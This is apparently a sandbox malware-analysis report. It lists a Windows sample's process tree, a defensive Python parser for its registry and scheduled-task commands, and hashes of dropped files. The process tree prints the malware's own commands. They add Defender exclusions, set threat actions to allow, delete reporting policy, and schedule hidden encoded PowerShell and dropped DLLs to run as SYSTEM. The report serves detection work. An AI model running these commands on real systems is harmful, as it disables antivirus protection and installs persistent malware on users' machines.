    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cvlBDCdIHRUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe [level 3, PID 4464]
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hlHvxOmTEzGU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe [level 3, PID 4640]
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe [level 3, PID 4240]
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\zlCauFJzutozcZAJ /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe [level 3, PID 1440]
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\zlCauFJzutozcZAJ /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe [level 3, PID 3368]
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\jdyPdRrHtWvLsYfgt /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe [level 3, PID 4196]
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\jdyPdRrHtWvLsYfgt /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe [level 3, PID 4980]
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe [level 3, PID 2092]
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe [level 3, PID 4220]
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe [level 3, PID 2616]
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VYfzEhPxBNNTaEVB /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe [level 3, PID 4236]
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VYfzEhPxBNNTaEVB /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe [level 3, PID 4676]
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zYDdeyryU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe [level 3, PID 4428]
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zYDdeyryU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe [level 3, PID 3496]
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hlHvxOmTEzGU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe [level 3, PID 4036]
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cvlBDCdIHRUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe [level 3, PID 4916]
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UJbqbYGEalpLkUITJzR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe [level 3, PID 1360]
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UJbqbYGEalpLkUITJzR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe [level 3, PID 1504]
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DDDIXrwIFTXkC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\cmd.exe [level 3, PID 2900]
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DDDIXrwIFTXkC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\schtasks.exe [level 2, PID 1416]
    schtasks /run /I /tn "gYrJUvLRf"
C:\Windows\SysWOW64\schtasks.exe [level 2, PID 3228]
    schtasks /CREATE /TN "gYrJUvLRf" /SC once /ST 00:25:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
- Creates scheduled task(s)
C:\Windows\SysWOW64\schtasks.exe [level 2, PID 1900]
    schtasks /run /I /tn "qxdnhmFGwPNMbPaLO"
C:\Windows\SysWOW64\schtasks.exe [level 2, PID 836]
    schtasks /CREATE /TN "qxdnhmFGwPNMbPaLO" /SC once /ST 02:48:53 /RU "SYSTEM" /TR "\"C:\Windows\Temp\zlCauFJzutozcZAJ\HRJGqkvITgoVywn\kihxzCQ.exe\" 6V /zNsite_idjqZ 525403 /S" /V1 /F
- Creates scheduled task(s)
C:\Windows\SysWOW64\schtasks.exe [level 2, PID 5024]
    schtasks /DELETE /F /TN "gYrJUvLRf"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE [level 1, PID 3460]
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
C:\Windows\system32\gpupdate.exe [level 2, PID 2900]
    "C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\reg.exe [level 3, PID 1956]
    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DDDIXrwIFTXkC" /t REG_DWORD /d 0 /reg:32
C:\Windows\system32\svchost.exe [level 1, PID 4572]
    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\gpscript.exe [level 1, PID 4676]
    gpscript.exe /RefreshSystemParam
C:\Windows\SysWOW64\reg.exe [level 1, PID 4500]
    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\Temp\zlCauFJzutozcZAJ\HRJGqkvITgoVywn\kihxzCQ.exe [level 1, PID 4536]
    C:\Windows\Temp\zlCauFJzutozcZAJ\HRJGqkvITgoVywn\kihxzCQ.exe 6V /zNsite_idjqZ 525403 /S
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
C:\Windows\SysWOW64\cmd.exe [level 2, PID 2968]
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
C:\Windows\SysWOW64\reg.exe [level 3, PID 4216]
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
C:\Windows\SysWOW64\rundll32.exe [level 3, PID 4216]
    C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\zlCauFJzutozcZAJ\vorQKlVs\HXnMzdU.dll",#1 /tBsite_idCkx 525403
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
C:\Windows\SysWOW64\schtasks.exe [level 4, PID 4324]
    schtasks /DELETE /F /TN "CJutnrVhMflOHRfra"
C:\Windows\SysWOW64\schtasks.exe [level 2, PID 2988]
    schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\zYDdeyryU\XeaYeM.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "VgITaIvscZwKwBA" /V1 /F
- Drops file in Windows directory
- Creates scheduled task(s)
C:\Windows\SysWOW64\cmd.exe [level 2, PID 4964]
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
C:\Windows\SysWOW64\schtasks.exe [level 2, PID 3740]
    schtasks /DELETE /F /TN "btngLezmYLEbkDGphz"
C:\Windows\SysWOW64\schtasks.exe [level 2, PID 2900]
    schtasks /END /TN "VgITaIvscZwKwBA"
C:\Windows\System32\Conhost.exe [level 3, PID 800]
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\schtasks.exe [level 2, PID 4920]
    schtasks /DELETE /F /TN "VgITaIvscZwKwBA"
- Suspicious use of WriteProcessMemory
C:\Windows\SysWOW64\schtasks.exe [level 2, PID 1496]
    schtasks /CREATE /TN "SLQITUEPpopzsX" /F /xml "C:\Program Files (x86)\hlHvxOmTEzGU2\VNGHZNM.xml" /RU "SYSTEM"
- Creates scheduled task(s)
C:\Windows\SysWOW64\schtasks.exe [level 2, PID 1188]
    schtasks /CREATE /TN "LrQnDOtBbSHPj2" /F /xml "C:\ProgramData\VYfzEhPxBNNTaEVB\KkPoFlh.xml" /RU "SYSTEM"
- Creates scheduled task(s)
C:\Windows\SysWOW64\schtasks.exe [level 2, PID 3664]
    schtasks /CREATE /TN "YnbtOrtOJHmhhNVIU2" /F /xml "C:\Program Files (x86)\UJbqbYGEalpLkUITJzR\IdGbxrm.xml" /RU "SYSTEM"
- Creates scheduled task(s)
C:\Windows\SysWOW64\schtasks.exe [level 2, PID 3876]
    schtasks /CREATE /TN "uNQkSyvwiQYktgVntFE2" /F /xml "C:\Program Files (x86)\DDDIXrwIFTXkC\XFXgLrP.xml" /RU "SYSTEM"
- Creates scheduled task(s)
C:\Windows\SysWOW64\schtasks.exe [level 2, PID 1840]
    schtasks /CREATE /TN "VgITaIvscZwKwBA2" /F /xml "C:\Program Files (x86)\zYDdeyryU\iIidkyK.xml" /RU "SYSTEM"
- Creates scheduled task(s)
C:\Windows\SysWOW64\schtasks.exe [level 2, PID 2928]
    schtasks /CREATE /TN "CJutnrVhMflOHRfra" /SC once /ST 00:44:27 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\zlCauFJzutozcZAJ\vorQKlVs\HXnMzdU.dll\",#1 /tBsite_idCkx 525403" /V1 /F
- Drops file in Windows directory
- Creates scheduled task(s)
C:\Windows\SysWOW64\cmd.exe [level 2, PID 976]
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
C:\Windows\SysWOW64\reg.exe [level 3, PID 320]
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
C:\Windows\SysWOW64\schtasks.exe [level 2, PID 316]
    schtasks /DELETE /F /TN "qxdnhmFGwPNMbPaLO"
C:\Windows\SysWOW64\cmd.exe [level 2, PID 2896]
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
- Suspicious use of WriteProcessMemory
C:\Windows\SysWOW64\schtasks.exe [level 2, PID 4164]
    schtasks /run /I /tn "CJutnrVhMflOHRfra"
C:\Windows\System32\Conhost.exe [level 1, PID 4240]
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe [level 1, PID 3228]
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
C:\Windows\System32\Conhost.exe [level 1, PID 1060]
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
C:\Windows\System32\Conhost.exe [level 1, PID 4652]
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe [level 1, PID 836]
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- Drops file in Windows directory
C:\Windows\SysWOW64\reg.exe [level 1, PID 1188]
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
C:\Windows\system32\rundll32.EXE [level 1, PID 2968]
    C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\zlCauFJzutozcZAJ\vorQKlVs\HXnMzdU.dll",#1 /tBsite_idCkx 525403
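The process tree above is, in effect, a script for neutering Defender through its policy hive rather than by touching the service: ThreatIDDefaultAction values written as 6 (Microsoft's action code for Allow) for a fixed list of threat IDs, Exclusions\Paths entries for every drop directory, deletion of the SpyNetReporting policy value, each write duplicated under /reg:32 and /reg:64, and scheduled tasks whose -EncodedCommand payload is base64 of UTF-16LE text (the one here decodes to start-process -WindowStyle Hidden gpupdate.exe /force, which forces a Group Policy refresh after the policy keys are written). The Python below is an added example, not tria.ge output and not code from the sample: it parses command lines of the shapes shown in this tree, deduplicates the 32/64-bit double writes, and decodes the task payload. The sample lines are copied from this report; treating \" inside a quoted argument as an escaped quote mirrors how the report renders nested quotes and is an assumption of this example, as are the category names.

```python
import base64
import json
import re

# Command lines copied from the process tree above: a constructed sample input
# for this example (the report lists many more of the same shape).
SAMPLE_LINES = [
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64',
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32',
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cvlBDCdIHRUn" /t REG_DWORD /d 0 /reg:32',
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\zlCauFJzutozcZAJ /t REG_DWORD /d 0 /reg:64',
    r'REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32',
    r'REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64',
    r'schtasks /CREATE /TN "gYrJUvLRf" /SC once /ST 00:25:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="',
    r'schtasks /CREATE /TN "qxdnhmFGwPNMbPaLO" /SC once /ST 02:48:53 /RU "SYSTEM" /TR "\"C:\Windows\Temp\zlCauFJzutozcZAJ\HRJGqkvITgoVywn\kihxzCQ.exe\" 6V /zNsite_idjqZ 525403 /S" /V1 /F',
    r'schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\zYDdeyryU\XeaYeM.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "VgITaIvscZwKwBA" /V1 /F',
    r'schtasks /CREATE /TN "SLQITUEPpopzsX" /F /xml "C:\Program Files (x86)\hlHvxOmTEzGU2\VNGHZNM.xml" /RU "SYSTEM"',
]

# Tokenizer for cmd-style argument strings: a double-quoted run in which \" is an
# escaped quote (assumed, matching the report's rendering), or a run of non-whitespace.
# Plain path backslashes are kept; a quoted path ending in a backslash would mis-tokenize.
TOKEN_RE = re.compile(r'"(?:\\.|[^"\\])*"|\S+')
_REG_FLAGS = {"/v": "value", "/t": "type", "/d": "data"}
DEFENDER_POLICY = r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender"
ALLOW = "6"  # ThreatIDDefaultAction action code 6 = Allow


def _unquote(tok):
    return tok[1:-1].replace('\\"', '"') if len(tok) > 1 and tok[0] == tok[-1] == '"' else tok


def parse_reg_command(line):
    """reg.exe ADD/DELETE line -> op, key, value name, type, data, view; None otherwise."""
    toks = [_unquote(t) for t in TOKEN_RE.findall(line)]
    i = next((k for k, t in enumerate(toks) if t.upper() in ("ADD", "DELETE")), None)
    if i is None or i + 1 >= len(toks):
        return None
    rec = {"op": toks[i].upper(), "key": toks[i + 1], "value": None, "type": None, "data": None, "view": "default"}
    rest = toks[i + 2:]
    for j, flag in enumerate(rest):
        f = flag.lower()
        if f in _REG_FLAGS and j + 1 < len(rest):
            rec[_REG_FLAGS[f]] = rest[j + 1]
        elif f.startswith("/reg:"):  # WOW64 view selector: /reg:32 or /reg:64
            rec["view"] = f[5:]
    return rec


def classify_defender_tamper(rec):
    """Label a parsed reg command by the Defender policy change it makes (category names are this example's)."""
    if rec is None or not rec["key"].lower().startswith(DEFENDER_POLICY.lower()):
        return None
    sub = rec["key"][len(DEFENDER_POLICY):].lstrip("\\").lower()
    if rec["op"] == "ADD" and sub == r"threats\threatiddefaultaction" and rec["data"] == ALLOW:
        return ("threat_allowed", rec["value"])
    if rec["op"] == "ADD" and sub == r"exclusions\paths":
        return ("path_excluded", rec["value"])
    if rec["op"] == "DELETE" and sub == "spynet":
        return ("spynet_value_deleted", rec["value"])
    if rec["op"] == "DELETE" and sub == r"exclusions\extensions":
        return ("extension_exclusion_deleted", rec["value"])
    return ("other_defender_policy_change", rec["value"])


def parse_schtasks_create(line):
    """schtasks /CREATE line -> task, run_as, schedule, start, action, xml; None otherwise."""
    toks = [_unquote(t) for t in TOKEN_RE.findall(line)]
    if "/CREATE" not in {t.upper() for t in toks}:
        return None
    fields = {"/TN": "task", "/RU": "run_as", "/SC": "schedule", "/ST": "start", "/TR": "action", "/XML": "xml"}
    rec = dict.fromkeys(fields.values())
    for j, t in enumerate(toks[:-1]):  # every flag of interest takes one argument
        if t.upper() in fields:
            rec[fields[t.upper()]] = toks[j + 1]
    return rec


def decode_encoded_command(action):
    """Decode a PowerShell -EncodedCommand (base64 of UTF-16LE text); None if absent."""
    m = re.search(r"(?:^|\s)-e(?:c|n\w*)?\s+([A-Za-z0-9+/=]+)", action, re.IGNORECASE)
    return base64.b64decode(m.group(1)).decode("utf-16-le") if m else None


def triage(lines):
    """Aggregate Defender policy changes and task registrations into one deterministic summary."""
    threat_allowed, path_excluded, other, tasks = {}, {}, [], []
    for line in lines:
        rec = parse_reg_command(line)
        hit = classify_defender_tamper(rec)
        if hit is not None:
            kind, value = hit
            if kind == "threat_allowed":
                threat_allowed.setdefault(value, set()).add(rec["view"])
            elif kind == "path_excluded":
                path_excluded.setdefault(value, set()).add(rec["view"])
            else:
                other.append((kind, value, rec["view"]))
        task = parse_schtasks_create(line)
        if task is not None:
            tasks.append(task)
    return {"threat_allowed": {k: sorted(v) for k, v in sorted(threat_allowed.items())},
            "path_excluded": {k: sorted(v) for k, v in sorted(path_excluded.items())},
            "other_policy_changes": sorted(other), "scheduled_tasks": tasks}


if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_LINES), indent=2))
```

Run as a script it prints the summary; the per-value view list shows the /reg:32 plus /reg:64 double writes collapsing to one indicator each. On a live host the same keys can be audited with reg query, or with Get-MpPreference, whose ThreatIDDefaultAction_Ids and ThreatIDDefaultAction_Actions properties expose the effective per-ID actions: an action of 6 for an ID nobody in the organisation set is a strong tamper indicator.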
Network
MITRE ATT&CK Enterprise v15
Downloads
-
  Filesize: 2KB
  MD5: 12f3bc3d66bce89946cdd64df2965ea4
  SHA1: 725b393ec3b6c639a1424c00d18ad89290b707b7
  SHA256: 32d61f0a0cdd3ff8bf6a7a5017a3cd96df6ada08c52df37b0fdb770933bf5ac7
  SHA512: 93b67247328743e2fa5294f1b4b0fb26eb031eb3b059acf2653e46ca76f150867ee6e973e12acb95ce05746dbe97dd137080beb5e5b648c5d275621d829888dc
-
  Filesize: 2KB
  MD5: 19c0421d0f2e2d8612ef4b0637aee209
  SHA1: e810beeecd4ea33461778fdd8a41309cd505676f
  SHA256: f33efb4faa4de2da6ba84e053193896503390fa6a4d57f220ac8f968d79683b1
  SHA512: eb7d835ed904541638fd628fa20523c34d4aba7c2102cfc9761ffb151c9fdc5e94438104ce88e5ad4816e4bded53f38965318c716521f25e1e970de7d9c7aaa8
-
  Filesize: 2KB
  MD5: 6c2cee2499aa588bb5f29a97e40c5285
  SHA1: 12cfed116f05321267b8201f2db2c999371256cc
  SHA256: 6f1cfc21538669c1231ce07e4b6b9242d191e131bd0e93628f85b9ba9194d8cf
  SHA512: d54f0e8846ae6ecefc7bc6047b684205765ababee88c997fdba900a0d06268609d599c70e92b5a8220460e9de479bd7aa18c049364c6463aeb77c0b7d8ee2c68
-
  Filesize: 2KB
  MD5: 515d9f58472daa8b0021b82f4c47db45
  SHA1: 028d9a8c4c0599951d712360e9b6656e8f5b1771
  SHA256: a1b05a8e5347b8aea238c263bdb207950a7a61f1cf437e5e974ee3631c476ec3
  SHA512: 2051d0c8339d036327fcbd5bdc7d466a0472006b5aa6991ccb60546fef56d80569dc2c31544f32be9bd19f48fc11dcd50dfaac517dd6280c8a5a39821cef9f7b
-
  Filesize: 239KB
  MD5: 5cea067f8db4f83e999e078e520ee197
  SHA1: 3cf6dffba50d80c50b7606568a7241b3c7c1a6de
  SHA256: 5bf4e37757754bc256a7594a1e19cd25660d1e5008d670c67cbfc4b4487b96ea
  SHA512: d5c2cb8ace2e099e9dd7350ca228908d4b3e82176795512a907c46136d764e4a05a6256c1434ee8de3687fdee2e16597d32107331401f902d0eb77cbbee616d5
-
  Filesize: 2KB
  MD5: ed93190496a6dbb711fe99352d2c0f51
  SHA1: 4048a36b9cf164b90c4b8a0398555f6b55653558
  SHA256: 6e391c3fff651f9b6d7c5ab3ea8626dca05720be7f744a4392709c7feaa46190
  SHA512: ef292ac01100a6ea2177422429462ef47c7409d44da2557ae0e086456df496e5c024c79e52972c03f2442a707f6176d3fbb3fa9823477d118d8b9d533353436c
- C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json
  Filesize: 187B
  MD5: 2a1e12a4811892d95962998e184399d8
  SHA1: 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
  SHA256: 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
  SHA512: bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
- C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json
  Filesize: 136B
  MD5: 238d2612f510ea51d0d3eaa09e7136b1
  SHA1: 0953540c6c2fd928dd03b38c43f6e8541e1a0328
  SHA256: 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
  SHA512: 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
- C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json
  Filesize: 150B
  MD5: 0b1cf3deab325f8987f2ee31c6afc8ea
  SHA1: 6a51537cef82143d3d768759b21598542d683904
  SHA256: 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
  SHA512: 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
  Filesize: 10KB
  MD5: fafa7ac5b92e71eab5d8e2786b2af656
  SHA1: 9cb9bf4787d5b7364c1458a31e94738a9cdfae80
  SHA256: 81480e93b7a45b4f591fb1cb7101e91d498ca77571af89e211d2822c852bdce1
  SHA512: 2ce71fc0988e3de28d60b5887cd4078fef8e898dd7b3b2f5e06f3eea70d252691a33f80606c78732f8c2db0f1356e5b3175df302cad07b7697226440b598191f
-
  Filesize: 2KB
  MD5: 6cf293cb4d80be23433eecf74ddb5503
  SHA1: 24fe4752df102c2ef492954d6b046cb5512ad408
  SHA256: b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
  SHA512: 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\abgdohlnibdejcajjfmngebmdanjldcc\1.2_0\_locales\es\messages.json
  Filesize: 151B
  MD5: bd6b60b18aee6aaeb83b35c68fb48d88
  SHA1: 9b977a5fbf606d1104894e025e51ac28b56137c3
  SHA256: b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
  SHA512: 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b
-
  Filesize: 9KB
  MD5: df9ee99b5541a817793e76137f2a9ad3
  SHA1: 86bc9e635e99c8bccd55e9a07e7a27e6f1708296
  SHA256: 92b7d51f18cb6410a3f098abf46e9c9d49e01f4899469c937d5ca8cd7e5ba414
  SHA512: c9a54cc6d2cdd1871da9384388535dd8fe3c79326106e69520c92f0fb1c6d20a966773ec23d506c37af0f2ff25a16fca9753830082f0d9295ac75a74e0f8ca51
-
  Filesize: 64B
  MD5: d8b9a260789a22d72263ef3bb119108c
  SHA1: 376a9bd48726f422679f2cd65003442c0b6f6dd5
  SHA256: d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
  SHA512: 550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b
-
  Filesize: 1.8MB
  MD5: 60cbb4b682e728c7393d7d25ffafd9b2
  SHA1: 582688c65ab39f61b96afbb8d6b1cf3480078802
  SHA256: 2093726bd0c5c1245cbd01b3af7a6ccf140da56f1687703a3f9ddb457d17731c
  SHA512: 5c126cff1f549f4b490a88803cbbd224fdbd39197a831f490314d0160c9670041531c92a08bf0ab7b063d54759a4de32ec6ed05cde9c099dda89c9cc6836efc4
-
  Filesize: 1.9MB
  MD5: 868184d4e2bc06fe3bb849c50ef78bff
  SHA1: 1d47783b94a10fe7961d24aad70519074eabaeed
  SHA256: 7df50f0915fe51f130b865c7d535be7ff9b738965d514074a3e714502012f4d8
  SHA512: 1e0918981a7a8233f102d56ac0437131079a59ead873045c4caf72298486df7c9e6bdd549988fff9e60e16035d202ceff9962e6fea54b304773af62943c54b10
-
  Filesize: 1021KB
  MD5: 5e6f30cf9a199a89c4a44c0448af6c91
  SHA1: aec753e49c10861adf6048047beea80dbe2c4768
  SHA256: e556cf074d98f9a6249bf3f35a92c741b19f379090cf80d2633f5a93bdfd8283
  SHA512: ae2c767e9638408178fb061c5e4c68fced551a39a5eff549f5ac71db16f3496e85b9953f1a90b80fedc70c95c77bf5acbc77860d5a1b0e72f91b9aa7a8b19796
-
  Filesize: 88KB
  MD5: 3fb0129edbbc4d02923b4088ed9a059e
  SHA1: 1058f83a0ef72ca8b98748444abe85318386a0e4
